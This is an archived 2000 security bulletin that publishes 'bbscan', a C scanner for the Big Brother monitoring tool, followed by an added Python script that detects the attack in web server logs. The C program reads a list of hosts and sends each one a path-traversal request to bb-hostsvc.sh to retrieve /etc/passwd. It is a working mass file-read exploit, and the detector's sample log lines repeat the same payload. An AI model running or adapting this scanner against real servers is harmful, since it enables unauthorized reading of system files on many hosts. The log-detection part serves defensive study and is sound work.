Subject: [TOOL] Big Brother vulnerability scanner
Date: Tue, 25 Jul 2000 17:17:16 +0200

Big Brother vulnerability scanner
--------------------------------------------------------------------------------

DETAILS

We reported in the past a few security vulnerabilities in the Big Brother application. The following utility can be used to scan hosts that run Big Brother for those vulnerabilities.

The vulnerabilities this scanner tests for are described in the following articles:
Two new Big Brother vulnerabilities
Big Brother allows remote command execution

Source Code:

/*
 *
 * 2000-07-11
 *
 * Ripped from phfscan.c
 * Big Brother Vulnerability scanner.
 * Scans for /cgi-bin/bb-hostsvc.sh.
 * If it exists you might be able to read files from
 * the system. Good luck.
 *
 *
 * Author: Safety@IRCnet who also discovered the bug.
 *         Safety@LinuxMail.ORG
 *
 *
 * Credits: #roothat, #vastervik, #smile, Loki, crimson, self,
 *          Bjurr, Metoo, and everyone else who thinks they should
 *          be on this list.
 *
 * Special Thanks goes to Loki who is going to host and design
 * my homepage.
 *
 *
 * Usage:
 *
 * ./bbscan < hostlist > outputfile
 *
 */

/* The header names were lost from this copy of the listing;
 * the headers below are the ones the code uses. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Cleared by the SIGALRM handler when connect() takes too long. */
volatile sig_atomic_t FLAG = 1;

void Call(int signo)
{
    (void) signo;
    FLAG = 0;
}

int main(int argc, char *argv[])
{
    char host[100], hosta[1024], FileBuf[8097];
    int outsocket, X;
    struct hostent *nametocheck;
    struct sockaddr_in serv_addr;
    struct in_addr outgoing;
    char bbvuln[] = "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd\n\n";

    /* One host name per line on stdin. */
    while (fgets(hosta, 100, stdin)) {
        if (hosta[0] == '\0')
            break;
        hosta[strcspn(hosta, "\n")] = '\0';   /* strip the newline, if present */

        /* Echo the host name so the output can be matched to the host. */
        write(1, hosta, strlen(hosta));
        write(1, "\n", 1);

        outsocket = socket(AF_INET, SOCK_STREAM, 0);
        memset(&serv_addr, 0, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;

        nametocheck = gethostbyname(hosta);
        if (nametocheck == NULL) {            /* name did not resolve: skip it */
            close(outsocket);
            continue;
        }

        /* Ugly stuff to get host name into inet_ntoa form */
        memcpy(&outgoing.s_addr, nametocheck->h_addr_list[0],
               sizeof(outgoing.s_addr));
        strncpy(host, inet_ntoa(outgoing), sizeof(host) - 1);
        host[sizeof(host) - 1] = '\0';
        serv_addr.sin_addr.s_addr = inet_addr(host);
        serv_addr.sin_port = htons(80);

        /* Give connect() ten seconds before the alarm clears FLAG. */
        signal(SIGALRM, Call);
        FLAG = 1;
        alarm(10);
        X = connect(outsocket, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
        alarm(0);

        if (FLAG == 1 && X == 0) {
            /* Send the request and copy the response to stdout. */
            write(outsocket, bbvuln, strlen(bbvuln));
            while ((X = read(outsocket, FileBuf, 8096)) > 0)
                write(1, FileBuf, X);
        }
        close(outsocket);
    }
    return 0;
}

ADDITIONAL INFORMATION

The information has been provided by Marcus Danielsson.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
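The request this scanner sends leaves a recognisable entry in a web server's access log. The following is an added example, not part of the original bulletin or of the scanner: it flags requests to bb-hostsvc.sh whose HOSTSVC parameter decodes to a path. The Common Log Format input, the function names and the rule that a legitimate HOSTSVC value contains no "/" or ".." are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request field of a Common Log Format entry; the HTTP version is optional
# because the scanner's request line carries none.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)(?: HTTP/[\d.]+)?"')
CGI_NAME = "bb-hostsvc.sh"

def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (%252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_hostsvc(target):
    """Return the decoded HOSTSVC value if it looks like a path, else None."""
    parts = urlsplit(target)
    if not fully_decode(parts.path).endswith("/" + CGI_NAME):
        return None
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(raw).replace("\\", "/")
        # Assumption: a legitimate value names a host/service pair and
        # never contains a path separator or a ".." component.
        if key == "HOSTSVC" and ("/" in value or ".." in value):
            return value
    return None

def scan(lines):
    """Return (client, decoded HOSTSVC) for every matching log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        hit = suspicious_hostsvc(match.group(1)) if match else None
        if hit is not None:
            hits.append((line.split(" ", 1)[0], hit))
    return hits

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jul/2000:17:20:01 +0200] "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd" 200 1432',
    '192.0.2.11 - - [25/Jul/2000:17:21:40 +0200] "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=www,example,com.http HTTP/1.0" 200 812',
    '192.0.2.12 - - [25/Jul/2000:17:22:05 +0200] "GET /cgi-bin/bb-hostsvc.sh?HOSTSVC=%252e%252e%252fetc%252fpasswd HTTP/1.0" 200 1432',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A 200 status on a flagged line means the CGI answered the request, so the response size is worth comparing with that of a normal status page.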